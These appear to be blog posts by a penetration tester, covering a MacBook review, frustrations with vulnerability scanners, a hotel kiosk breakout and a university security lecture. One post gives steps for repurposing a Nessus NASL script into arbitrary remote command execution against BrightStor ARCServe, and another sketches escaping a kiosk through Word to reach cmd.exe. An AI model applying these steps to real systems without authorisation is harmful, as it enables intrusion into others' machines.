cyberwart

Adam talked me into buying a Macbook. It’s not overly hard to talk me into buying technology so lets not give him too much credit. Really, all I needed was a laptop that could do basic Internet type stuff and run VMware. As you may have read earlier, we were swamped with scanning so I had to push two boxes to be scanning machines, which left me with limited ability to do real work or to stay up on business stuff like email.

So my experience so far: Everyone knows Macs are pretty. They’re light and have small sleek form factor. The display is lovely. They keyboard is spacious and easy to use. The touchpad took a bit to get use to, but overall I’m not happy with it. It’s multi-touch capable and overall a nifty tool once you learn how to use it.

Software is actually good. Vmware Fusion is nicer and more responsive than either VMware Workstation or Server. Graphics run far faster and it’s a nicer experience. Additionally, you can use “Unity” and run Windows software on the Mac desktop. The only thing that really irks me is that there isn’t a Vmware-server-console or a Firefox/Safari plugin to access VMware server easily. So access is through a contrived VM in a VM type thing or over X11. It’s ugly, but it’s been fairly successful.

Port is my friend. It installs basically everything you might want. It has some quirks, but being a Gentoo guy I’m use to a certain amount of pain when moving to a new OS. Port builds from source and usually works — once you learn a few tricks. I have Wireshark, libpcap, libnet, scapy, python, CANVAS, metasploit, kismet, nmap, and hping working. Nessus has an install for Mac.

My Verizon Mobile Card works fine

MS Office is fine. It looks a little different but it’s Office.

Hardware is blazing. I have 4 gigs of Ram. A 250 gb hard drive and a 2.4Ghz Core duo.

Overall, I think it’s a very positive experience and I’d recommend it if you have a bit of tim to invest in getting familiar with the OS and getting the tools that you need onto the box.

Everyone loves to beat up on Microsoft. Hell, I do… sorry Carric. But Microsoft is slowly getting it’s software in order and organizations are learning to patch it very quickly. Personally,  love doing exploit development on small custom software. But in a recent case, I saw a larger software package with a known bug but no exploit.

In particular, I’m talking about the command execution vuln released in October for BrightStor ARCServe. BID 31684.

To actually exploit the bug use Nessus/Nasl

Find the file: arcserve_command_exec.nasl

Copy it somewhere and edit. Change the following:

1. Ditch the requirements. Comment out
   #script_require_keys(“Host/OS/smb”)
   #script_require_ports (6504);
2. Manually set the hostname
   host = kb_smb_name(); to host = “hostname”; Note, and IP won’t work
3. Change the cmd
   cmd = “ifconfig”; to whatever you want
4. Change the output to use the display() function so you can see what happens
5. Run the NASL
   nasl -t target_ip_or_hostname yournasl.nasl

Yes, this is a bit clunky, but it’s a fairly quick way to execute arbitrary commands on the remote system. RPC (IMO) is difficult and I’d rather not deal with it if some else already has.

I’ve decided that I truly HATE most vulnerability scanners. Generally I don’t trust the things, but they’ve always done a fair job of giving me a checkbox for patches and by providing a little guidance on how to attack a network. Well recently we’re had to scan multiple class B networks both internally and externally. It’s been brutal. Nothing finishes, results vary. It sucks hardcore.

I’ve noticed a few things. First, it’s almost impossible to by vuln scanning software these days. Everyone wants to sell an appliance .As a consultant that doesn’t really work for me. I need to take the software with me on a laptop into a client site. An appliance makes the software basically useless.

So our Qualys box is out of the mix. Next we moved onto Nessus. Who doesn’t love Nessus? It’s not flashy but it gets the job done… right? Well no. It crashed. Over and over. It wouldn’t save state and if it crashed you had to restart.

Fuck.

Sure you say, do small bunches at once. Well this shouldn’t matter. It irked me that Nessus didn’t do the host management/scanning properly itself. Manually manging it is nuts. But worse, If you break scans into small bunches, you then have to merge all the results at the end.

Next I tried an old FS image. Well that can pause scans and resume them after a crash, but it’s had previous known issues. Further, it won’t finish. It’s hung at 99% done for days. I’ve checked and it’s still running scans and producing results but 99% for days.

I find it sad that a team of pen testers, some previously software developers, and all experienced with the tools can’t get them to work effectively.

As most of my friends know, I have a tendency to run late. Well I was running late the other day holding up my friend, Adam Pridgen. He was patiently waiting for me in the hotel lobby and started playing with the kiosk. I beleive the particular software is kiosksafe. I had ran into it before and knew that it did a fair job. The software not only remaps/intercepts kep strokes but it also appears to run some sort of rootkit. When a particular API is called — or possibly a window has a certain name, the software locks the site down. It’s most unfortunate.

I threw iKat at it for fun. I saw iKat at defcon and always wanted to give it a try. It did a fair job of crashing the hell out of the Kiosk but it gave me fairly limited results.

Everyone knows the typical file-menu type hacks trying to find something that opens up  the system in a somewhat clever manner. Those didn’t work, but Office had potential. So I decided to play. In the end, I got a fair amount of access with a Word doc.

First, change the default configuration paths for Word. This just makes sure Word opens up with high level access. I generally set it to C:\

The below screenshots show most of the process

Double click the icon and hopefully it works for you. cmd.exe sometimes has issues but IE, Windows Media Player, etc work a little better

Sample word doc provided shortly.

I had the opportunity to teach class at a University last week. It was an interesting experience. A friend of mine, Adam Pridgen, co lectured with me. The class was a senior level seminar type class on computer security. I wasn’t sure exactly what to expect going into the class, but I had done a previous intro to penetration testing so I updated that and went in.
The class started with an intro presentation by one of the students. It appears the students update the class with a somewhat recent security topic. In this case, it was a 5 minute overview of the uTorrent overflow. I was immediately nervous as I only had 10-15% of my slides at the in-depth exploitation/fuzzing level. I was worried that I would bore the class or not be able to speak with enough knowledge of particular exploits straight from memory. After the student got past the first slide or two, there were some contradictions and inaccuracies. The students didn’t jump on it so I figured I wasn’t in too much trouble.

Shortly there after, Adam and I were introduced and we went into our thing. We talked about some of the common mistakes that really enable attackers to compromise networks. We discussed some of the tools and techniques we used – giving examples of situations where we had used them. Unfortunately, I don’t think they really connected. The professor got into it, but not the students. Between a couple non-public bugs/attacks and the story of the power company CEO ignoring the out-briefing until I showed a screenshot of his email – I thought we were golden. But I guess such is the state of computer security education right now.